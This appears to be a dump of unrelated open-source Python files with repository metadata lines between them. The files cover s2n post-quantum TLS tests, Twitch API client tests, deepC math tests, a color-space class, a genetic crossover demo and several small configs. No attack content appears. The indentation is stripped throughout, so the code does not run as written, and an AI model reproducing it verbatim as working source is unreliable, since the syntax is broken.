# depending on how s2n was compiled, the curve may be either x25519 or p256.
(Ciphers.PQ_TLS_1_0_2020_12, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "TLS_AES_256_GCM_SHA384", "kem": "NONE", "kem_group": "_kyber-512-r2"},
(Ciphers.PQ_TLS_1_0_2020_12, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"},
(Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_KYBER512R2):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_kyber-512-r2"},
(Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_BIKE1L1FOR2):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_bike-1l1fo-r2"},
(Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_SIKEP434R3):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_sike-p434-r3"},
(KemGroups.P256_KYBER512R2, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_kyber-512-r2"},
(KemGroups.P256_BIKE1L1FOR2, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_bike-1l1fo-r2"},
(KemGroups.P256_SIKEP434R3, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_sike-p434-r3"},
}
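# Each EXPECTED_RESULTS value lists the strings that assert_s2n_negotiation_parameters()
# looks for in s2n's stdout: the negotiated cipher, the TLS 1.2 hybrid KEM (or NONE), and
# the TLS 1.3 KEM group (or NONE).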
"""
Similar to invalid_test_parameters(), this validates the test parameters for
both client and server. Returns True if the test case using these parameters
should be skipped.
"""
def invalid_pq_handshake_test_parameters(*args, **kwargs):
client_cipher_kwargs = kwargs.copy()
client_cipher_kwargs["cipher"] = kwargs["client_cipher"]
server_cipher_kwargs = kwargs.copy()
server_cipher_kwargs["cipher"] = kwargs["server_cipher"]
# `or` is correct: invalid_test_parameters() returns True if the parameters are invalid;
# we want to return True here if either of the sets of parameters are invalid.
return invalid_test_parameters(*args, **client_cipher_kwargs) or invalid_test_parameters(*args, **server_cipher_kwargs)
def get_oqs_openssl_override_env_vars():
oqs_openssl_install_dir = os.environ["OQS_OPENSSL_1_1_1_INSTALL_DIR"]
override_env_vars = dict()
override_env_vars["PATH"] = oqs_openssl_install_dir + "/bin"
override_env_vars["LD_LIBRARY_PATH"] = oqs_openssl_install_dir + "/lib"
return override_env_vars
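# The returned overrides point PATH and LD_LIBRARY_PATH at the OQS-OpenSSL 1.1.1 build
# named by OQS_OPENSSL_1_1_1_INSTALL_DIR, so the OpenSSL provider in these tests runs the
# PQ-capable binary rather than the system one.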
def assert_s2n_negotiation_parameters(s2n_results, expected_result):
if expected_result is not None:
assert to_bytes(("Cipher negotiated: " + expected_result['cipher'])) in s2n_results.stdout
assert to_bytes(("KEM: " + expected_result['kem'])) in s2n_results.stdout
# Purposefully leave off the "KEM Group: " prefix in order to perform partial matches
# without specifying the curve.
assert to_bytes(expected_result['kem_group']) in s2n_results.stdout
@pytest.mark.uncollect_if(func=invalid_pq_handshake_test_parameters)
@pytest.mark.parametrize("protocol", [Protocols.TLS12, Protocols.TLS13], ids=get_parameter_name)
@pytest.mark.parametrize("client_cipher", CIPHERS, ids=get_parameter_name)
@pytest.mark.parametrize("server_cipher", CIPHERS, ids=get_parameter_name)
def test_s2nc_to_s2nd_pq_handshake(managed_process, protocol, client_cipher, server_cipher):
port = next(available_ports)
client_options = ProviderOptions(
mode=Provider.ClientMode,
port=port,
insecure=True,
cipher=client_cipher,
protocol=protocol)
server_options = ProviderOptions(
mode=Provider.ServerMode,
port=port,
protocol=protocol,
cipher=server_cipher,
cert=Certificates.RSA_4096_SHA512.cert,
key=Certificates.RSA_4096_SHA512.key)
server = managed_process(S2N, server_options, timeout=5)
client = managed_process(S2N, client_options, timeout=5)
if pq_enabled():
expected_result = EXPECTED_RESULTS.get((client_cipher, server_cipher), None)
else:
# If PQ is not enabled in s2n, we expect classic handshakes to be negotiated.
# Leave the expected cipher blank, as there are multiple possibilities - the
# important thing is that kem and kem_group are NONE.
expected_result = {"cipher": "", "kem": "NONE", "kem_group": "NONE"}
# Client and server are both s2n; can make meaningful assertions about negotiation for both
for results in client.get_results():
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
for results in server.get_results():
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
@pytest.mark.uncollect_if(func=invalid_test_parameters)
@pytest.mark.parametrize("protocol", [Protocols.TLS13], ids=get_parameter_name)
@pytest.mark.parametrize("cipher", [Ciphers.PQ_TLS_1_0_2020_12], ids=get_parameter_name)
@pytest.mark.parametrize("kem_group", KEM_GROUPS, ids=get_parameter_name)
def test_s2nc_to_oqs_openssl_pq_handshake(managed_process, protocol, cipher, kem_group):
# If PQ is not enabled in s2n, there is no reason to test against oqs_openssl
if not pq_enabled():
return
port = next(available_ports)
client_options = ProviderOptions(
mode=Provider.ClientMode,
port=port,
insecure=True,
cipher=cipher,
protocol=protocol)
server_options = ProviderOptions(
mode=Provider.ServerMode,
port=port,
protocol=protocol,
cert=Certificates.RSA_4096_SHA512.cert,
key=Certificates.RSA_4096_SHA512.key,
env_overrides=get_oqs_openssl_override_env_vars(),
extra_flags=['-groups', kem_group.oqs_name])
server = managed_process(OpenSSL, server_options, timeout=5)
client = managed_process(S2N, client_options, timeout=5)
expected_result = EXPECTED_RESULTS.get((cipher, kem_group), None)
for results in client.get_results():
# Client is s2n; can make meaningful assertions about negotiation
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
for results in server.get_results():
# Server is OQS OpenSSL; just ensure the process exited successfully
results.assert_success()
@pytest.mark.uncollect_if(func=invalid_test_parameters)
@pytest.mark.parametrize("protocol", [Protocols.TLS13], ids=get_parameter_name)
@pytest.mark.parametrize("cipher", [Ciphers.PQ_TLS_1_0_2020_12], ids=get_parameter_name)
@pytest.mark.parametrize("kem_group", KEM_GROUPS, ids=get_parameter_name)
def test_oqs_openssl_to_s2nd_pq_handshake(managed_process, protocol, cipher, kem_group):
# If PQ is not enabled in s2n, there is no reason to test against oqs_openssl
if not pq_enabled():
return
port = next(available_ports)
client_options = ProviderOptions(
mode=Provider.ClientMode,
port=port,
protocol=protocol,
env_overrides=get_oqs_openssl_override_env_vars(),
extra_flags=['-groups', kem_group.oqs_name])
server_options = ProviderOptions(
mode=Provider.ServerMode,
port=port,
protocol=protocol,
cipher=cipher,
cert=Certificates.RSA_4096_SHA512.cert,
key=Certificates.RSA_4096_SHA512.key)
server = managed_process(S2N, server_options, timeout=5)
client = managed_process(OpenSSL, client_options, timeout=5)
expected_result = EXPECTED_RESULTS.get((kem_group, cipher), None)
for results in client.get_results():
# Client is OQS OpenSSL; just ensure the process exited successfully
results.assert_success()
for results in server.get_results():
# Server is s2n; can make meaningful assertions about negotiation
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
|
configs/models/aotl.py | yoxu515/aot-benchmark | 105 | 12635081 | <reponame>yoxu515/aot-benchmark<filename>configs/models/aotl.py
import os
from .default import DefaultModelConfig
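# AOT-L variant: stacks 3 LSTT blocks and refreshes the long-term memory every 2 frames
# during training and every 5 frames at test time (the values set below).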
class ModelConfig(DefaultModelConfig):
def __init__(self):
super().__init__()
self.MODEL_NAME = 'AOTL'
self.MODEL_LSTT_NUM = 3
self.TRAIN_LONG_TERM_MEM_GAP = 2
self.TEST_LONG_TERM_MEM_GAP = 5 |
02_advanced/02_debugging/ex_01_compute_test_value.py | johny-c/theano_exercises | 711 | 12635083 | # Run
# python 01_compute_test_value.py
# It should raise an exception when it tries to execute the call to fn.
# The exception doesn't make it easy to tell which line of the python script
# first created an invalid expression though.
# Modify the script to use compute_test_value to find the first bad line.
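# Hint (one possible approach, not part of the original script): import theano, set
# theano.config.compute_test_value = 'raise' before building the graph, and attach a
# test value to the input, e.g. a.tag.test_value = np.ones((3,), dtype=a.dtype), so the
# first invalid expression raises at graph-construction time.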
import numpy as np
from theano import function
from theano import tensor as T
a = T.vector()
b = T.log(a)
c = T.nnet.sigmoid(b)
d = T.sqrt(c)
e = T.concatenate((d, c), axis=0)
f = b * c * d
g = e + f
h = g / c
fn = function([a], h)
fn(np.ones((3,)).astype(a.dtype))
print "SUCCESS!"
|
test/swig/nnScalarOperators.py | AyishaR/deepC | 223 | 12635116 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
#
# This file is part of DNN compiler maintained at
# https://github.com/ai-techsystems/dnnCompiler
import common; # DNNC path setup
import deepC.dnnc as dc
import numpy as np
import unittest, random, math
def temp_softsign(x):
return x / (1 + np.abs(x))
def temp_erf(x):
y = np.vectorize(math.erf)(x).astype(np.float32)
return y
class nnScalarOperatorsTest(unittest.TestCase):
def setUp(self):
self.random_number1 = random.randrange(20, 50, 3)
self.random_number2 = random.randrange(200, 500, 1)
self.random_number3 = random.randrange(10, 500, 2)
# self.np_a = np.array(self.random_number1).astype(np.float32)
# self.np_b = np.array(self.random_number2).astype(np.float32)
# self.dc_a = dc.array([self.random_number1])
# self.dc_b = dc.array([self.random_number2])
self.np_a = self.random_number1
self.np_b = self.random_number2
self.dc_a = self.random_number1
self.dc_b = self.random_number2
def test_nnScalar_asin (self):
np.testing.assert_allclose(np.arcsin(1), dc.asin(1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsin(0), dc.asin(0), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsin(-1), dc.asin(-1), rtol=1e-3, atol=1e-3)
def test_nnScalar_acos (self):
np.testing.assert_allclose(np.arccos(1), dc.acos(1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccos(0), dc.acos(0), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccos(-1), dc.acos(-1), rtol=1e-3, atol=1e-3)
def test_nnScalar_atan (self):
np.testing.assert_allclose(np.arctan(self.random_number1), dc.atan(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arctan(self.random_number2), dc.atan(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arctan(self.random_number3), dc.atan(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_asinh (self):
np.testing.assert_allclose(np.arcsinh(self.random_number1), dc.asinh(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsinh(self.random_number2), dc.asinh(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsinh(self.random_number3), dc.asinh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_acosh (self):
np.testing.assert_allclose(np.arccosh(self.random_number1), dc.acosh(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccosh(self.random_number2), dc.acosh(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccosh(self.random_number3), dc.acosh(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_atanh (self):
# np.testing.assert_allclose(np.arctanh(self.random_number1), dc.atanh(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.arctanh(self.random_number2), dc.atanh(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.arctanh(self.random_number3), dc.atanh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_sin (self):
np.testing.assert_allclose(np.sin(self.random_number1), dc.sin(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sin(self.random_number2), dc.sin(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sin(self.random_number3), dc.sin(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_cos (self):
np.testing.assert_allclose(np.cos(self.random_number1), dc.cos(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.cos(self.random_number2), dc.cos(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.cos(self.random_number3), dc.cos(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_tan (self):
np.testing.assert_allclose(np.tan(self.random_number1), dc.tan(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tan(self.random_number2), dc.tan(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tan(self.random_number3), dc.tan(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_sinh (self):
# np.testing.assert_allclose(np.sinh(self.random_number1), dc.sinh(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.sinh(self.random_number2), dc.sinh(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.sinh(self.random_number3), dc.sinh(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_cosh (self):
# np.testing.assert_allclose(np.cosh(self.random_number1), dc.cosh(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.cosh(self.random_number2), dc.cosh(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.cosh(self.random_number3), dc.cosh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_tanh (self):
np.testing.assert_allclose(np.tanh(self.random_number1), dc.tanh(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tanh(self.random_number2), dc.tanh(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tanh(self.random_number3), dc.tanh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_erf (self):
np.testing.assert_allclose(temp_erf(self.random_number1), dc.erf(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_erf(self.random_number2), dc.erf(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_erf(self.random_number3), dc.erf(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_exp (self):
# np.testing.assert_allclose(np.exp(self.random_number1), dc.exp(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.exp(self.random_number2), dc.exp(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.exp(self.random_number3), dc.exp(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_log (self):
np.testing.assert_allclose(np.log(self.random_number1), dc.log(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.log(self.random_number2), dc.log(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.log(self.random_number3), dc.log(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_logical_not (self):
np.testing.assert_allclose(np.logical_not(self.random_number1), dc.logical_not(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.logical_not(self.random_number2), dc.logical_not(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.logical_not(self.random_number3), dc.logical_not(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_sign (self):
np.testing.assert_allclose(np.sign(self.random_number1), dc.sign(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sign(self.random_number2), dc.sign(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sign(self.random_number3), dc.sign(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_softsign (self):
np.testing.assert_allclose(temp_softsign(self.random_number1), dc.softsign(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_softsign(self.random_number2), dc.softsign(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_softsign(self.random_number3), dc.softsign(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_max (self):
npr = np.maximum(self.np_a, self.np_b)
dcr = dc.max([self.dc_a,self.dc_b])
np.testing.assert_allclose(npr, np.array(dcr).astype(np.float32),rtol=1e-3, atol=1e-3)
def test_nnScalar_min (self):
npr = np.minimum(self.np_a, self.np_b)
dcr = dc.min([self.dc_a,self.dc_b])
np.testing.assert_allclose(npr, np.array(dcr).astype(np.float32),rtol=1e-3, atol=1e-3)
def tearDown(self):
return "test finished"
if __name__ == '__main__':
unittest.main()
|
tests/api/test_communities.py | LEv145/python-twitch-client | 171 | 12635172 | <filename>tests/api/test_communities.py
import json
import pytest
import responses
from twitch.client import TwitchClient
from twitch.constants import BASE_URL
from twitch.exceptions import TwitchAttributeException
from twitch.resources import Community, User
example_community = {
"_id": "e9f17055-810f-4736-ba40-fba4ac541caa",
"name": "DallasTesterCommunity",
}
example_user = {
"_id": "44322889",
"name": "dallas",
}
@responses.activate
def test_get_by_name():
responses.add(
responses.GET,
"{}communities".format(BASE_URL),
body=json.dumps(example_community),
status=200,
content_type="application/json",
)
client = TwitchClient("client id")
community = client.communities.get_by_name("spongebob")
assert len(responses.calls) == 1
assert isinstance(community, Community)
assert community.id == example_community["_id"]
assert community.name == example_community["name"]
@responses.activate
def test_get_by_id():
community_id = "abcd"
responses.add(
responses.GET,
"{}communities/{}".format(BASE_URL, community_id),
body=json.dumps(example_community),
status=200,
content_type="application/json",
)
client = TwitchClient("client id")
community = client.communities.get_by_id(community_id)
assert len(responses.calls) == 1
assert isinstance(community, Community)
assert community.id == example_community["_id"]
assert community.name == example_community["name"]
@responses.activate
def test_update():
community_id = "abcd"
responses.add(
responses.PUT,
"{}communities/{}".format(BASE_URL, community_id),
body=json.dumps(example_community),
status=204,
content_type="application/json",
)
client = TwitchClient("client id")
client.communities.update(community_id)
assert len(responses.calls) == 1
@responses.activate
def test_get_top():
response = {"_cursor": "MTA=", "_total": 100, "communities": [example_community]}
responses.add(
responses.GET,
"{}communities/top".format(BASE_URL),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id")
communities = client.communities.get_top()
assert len(responses.calls) == 1
assert len(communities) == 1
community = communities[0]
assert isinstance(community, Community)
assert community.id == example_community["_id"]
assert community.name == example_community["name"]
@responses.activate
@pytest.mark.parametrize("param,value", [("limit", 101)])
def test_get_top_raises_if_wrong_params_are_passed_in(param, value):
client = TwitchClient("client id")
kwargs = {param: value}
with pytest.raises(TwitchAttributeException):
client.communities.get_top(**kwargs)
@responses.activate
def test_get_banned_users():
community_id = "abcd"
response = {"_cursor": "", "banned_users": [example_user]}
responses.add(
responses.GET,
"{}communities/{}/bans".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
users = client.communities.get_banned_users(community_id)
assert len(responses.calls) == 1
assert len(users) == 1
user = users[0]
assert isinstance(user, User)
assert user.id == example_user["_id"]
assert user.name == example_user["name"]
@responses.activate
@pytest.mark.parametrize("param,value", [("limit", 101)])
def test_get_banned_users_raises_if_wrong_params_are_passed_in(param, value):
client = TwitchClient("client id", "oauth token")
kwargs = {param: value}
with pytest.raises(TwitchAttributeException):
client.communities.get_banned_users("1234", **kwargs)
@responses.activate
def test_ban_user():
community_id = "abcd"
user_id = 1234
responses.add(
responses.PUT,
"{}communities/{}/bans/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.ban_user(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_unban_user():
community_id = "abcd"
user_id = 1234
responses.add(
responses.DELETE,
"{}communities/{}/bans/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.unban_user(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_create_avatar_image():
community_id = "abcd"
responses.add(
responses.POST,
"{}communities/{}/images/avatar".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.create_avatar_image(community_id, "imagecontent")
assert len(responses.calls) == 1
@responses.activate
def test_delete_avatar_image():
community_id = "abcd"
responses.add(
responses.DELETE,
"{}communities/{}/images/avatar".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_avatar_image(community_id)
assert len(responses.calls) == 1
@responses.activate
def test_create_cover_image():
community_id = "abcd"
responses.add(
responses.POST,
"{}communities/{}/images/cover".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.create_cover_image(community_id, "imagecontent")
assert len(responses.calls) == 1
@responses.activate
def test_delete_cover_image():
community_id = "abcd"
responses.add(
responses.DELETE,
"{}communities/{}/images/cover".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_cover_image(community_id)
assert len(responses.calls) == 1
@responses.activate
def test_get_moderators():
community_id = "abcd"
response = {"moderators": [example_user]}
responses.add(
responses.GET,
"{}communities/{}/moderators".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
moderators = client.communities.get_moderators(community_id)
assert len(responses.calls) == 1
assert len(moderators) == 1
user = moderators[0]
assert isinstance(user, User)
assert user.id == example_user["_id"]
assert user.name == example_user["name"]
@responses.activate
def test_add_moderator():
community_id = "abcd"
user_id = 12345
responses.add(
responses.PUT,
"{}communities/{}/moderators/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.add_moderator(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_delete_moderator():
community_id = "abcd"
user_id = 12345
responses.add(
responses.DELETE,
"{}communities/{}/moderators/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_moderator(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_get_permissions():
community_id = "abcd"
response = {"ban": True, "timeout": True, "edit": True}
responses.add(
responses.GET,
"{}communities/{}/permissions".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
permissions = client.communities.get_permissions(community_id)
assert len(responses.calls) == 1
assert isinstance(permissions, dict)
assert permissions["ban"] is True
@responses.activate
def test_report_violation():
community_id = "abcd"
responses.add(
responses.POST,
"{}communities/{}/report_channel".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.report_violation(community_id, 12345)
assert len(responses.calls) == 1
@responses.activate
def test_get_timed_out_users():
community_id = "abcd"
response = {"_cursor": "", "timed_out_users": [example_user]}
responses.add(
responses.GET,
"{}communities/{}/timeouts".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
users = client.communities.get_timed_out_users(community_id)
assert len(responses.calls) == 1
assert len(users) == 1
user = users[0]
assert isinstance(user, User)
assert user.id == example_user["_id"]
assert user.name == example_user["name"]
@responses.activate
@pytest.mark.parametrize("param,value", [("limit", 101)])
def test_get_timed_out_users_raises_if_wrong_params_are_passed_in(param, value):
client = TwitchClient("client id", "oauth token")
kwargs = {param: value}
with pytest.raises(TwitchAttributeException):
client.communities.get_timed_out_users("1234", **kwargs)
@responses.activate
def test_add_timed_out_user():
community_id = "abcd"
user_id = 12345
responses.add(
responses.PUT,
"{}communities/{}/timeouts/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.add_timed_out_user(community_id, user_id, 5)
assert len(responses.calls) == 1
@responses.activate
def test_delete_timed_out_user():
community_id = "abcd"
user_id = 12345
responses.add(
responses.DELETE,
"{}communities/{}/timeouts/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_timed_out_user(community_id, user_id)
assert len(responses.calls) == 1
|
lib/coloraide/spaces/xyz.py | facelessuser/ColorHelper | 253 | 12635178 | """XYZ D65 class."""
from ..spaces import Space, RE_DEFAULT_MATCH, GamutUnbound
import re
class XYZ(Space):
"""XYZ D65 class."""
SPACE = "xyz"
SERIALIZE = ("xyz", "xyz-d65")
CHANNEL_NAMES = ("x", "y", "z", "alpha")
DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space='|'.join(SERIALIZE), channels=3))
WHITE = "D65"
RANGE = (
GamutUnbound([0.0, 1.0]),
GamutUnbound([0.0, 1.0]),
GamutUnbound([0.0, 1.0])
)
@property
def x(self):
"""X channel."""
return self._coords[0]
@x.setter
def x(self, value):
"""Shift the X."""
self._coords[0] = self._handle_input(value)
@property
def y(self):
"""Y channel."""
return self._coords[1]
@y.setter
def y(self, value):
"""Set Y."""
self._coords[1] = self._handle_input(value)
@property
def z(self):
"""Z channel."""
return self._coords[2]
@z.setter
def z(self, value):
"""Set Z channel."""
self._coords[2] = self._handle_input(value)
@classmethod
def _to_xyz(cls, parent, xyz):
"""To XYZ."""
return parent.chromatic_adaptation(cls.WHITE, XYZ.WHITE, xyz)
@classmethod
def _from_xyz(cls, parent, xyz):
"""From XYZ."""
return parent.chromatic_adaptation(XYZ.WHITE, cls.WHITE, xyz)
|
homeassistant/components/kulersky/const.py | MrDelik/core | 30,023 | 12635182 | <filename>homeassistant/components/kulersky/const.py
"""Constants for the Kuler Sky integration."""
DOMAIN = "kulersky"
DATA_ADDRESSES = "addresses"
DATA_DISCOVERY_SUBSCRIPTION = "discovery_subscription"
|
tests/template_tests/templatetags/tag_27584.py | ni-ning/django | 61,676 | 12635212 | <filename>tests/template_tests/templatetags/tag_27584.py
from django import template
register = template.Library()
@register.tag
def badtag(parser, token):
parser.parse(('endbadtag',))
parser.delete_first_token()
return BadNode()
class BadNode(template.Node):
def render(self, context):
raise template.TemplateSyntaxError('error')
|
vol2/vol2-python-examples/examples/example_crossover.py | Sun-Joong/aifh | 777 | 12635230 | <gh_stars>100-1000
#!/usr/bin/env python
"""
Artificial Intelligence for Humans
Volume 2: Nature-Inspired Algorithms
Python Version
http://www.aifh.org
http://www.jeffheaton.com
Code repository:
https://github.com/jeffheaton/aifh
Copyright 2014 by <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
For more information on Heaton Research copyrights, licenses
and trademarks visit:
http://www.heatonresearch.com/copyright
============================================================================================================
This example uses crossover to combine two parent genomes to produce two children.
Both repeating and non-repeating splice are used.
Crossover Splice
Parent 1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
Parent 2: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
Offspring 1: [1, 2, 3, 4, 5, 6, 4, 3, 2, 1]
Offspring 2: [10, 9, 8, 7, 6, 5, 7, 8, 9, 10]
Crossover Splice No Repeat
Parent 1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
Parent 2: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
Offspring 1: [10, 3, 2, 4, 5, 6, 7, 8, 9, 1]
Offspring 2: [1, 8, 9, 7, 6, 5, 4, 3, 2, 10]
"""
import sys
import os
# Find the AIFH core files
aifh_dir = os.path.dirname(os.path.abspath(__file__))
aifh_dir = os.path.abspath(aifh_dir + os.sep + ".." + os.sep + "lib" + os.sep + "aifh")
sys.path.append(aifh_dir)
from genetic import *
from genetic import Genome
from genetic import Species
p1 = [ 1,2,3,4,5,6,7,8,9,10 ]
p2 = [ 10,9,8,7,6,5,4,3,2,1 ]
off = [[],[]]
pop = Population()
print("Crossover Splice")
crossover_splice(pop, p1,p2,off)
print("Parent 1: " + str(p1))
print("Parent 2: " + str(p2))
print("Offspring 1: " + str(off[0]))
print("Offspring 2: " + str(off[1]))
print()
print("Crossover Splice No Repeat")
crossover_splice_no_repeat(pop, p1,p2,off)
print("Parent 1: " + str(p1))
print("Parent 2: " + str(p2))
print("Offspring 1: " + str(off[0]))
print("Offspring 2: " + str(off[1])) |
tests/ut/python/pass/test_helptiling.py | tianjiashuo/akg | 286 | 12635231 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from akg.utils import kernel_exec as utils
LEVEL1_SUCC = "Help tiling level 1 exit successfully"
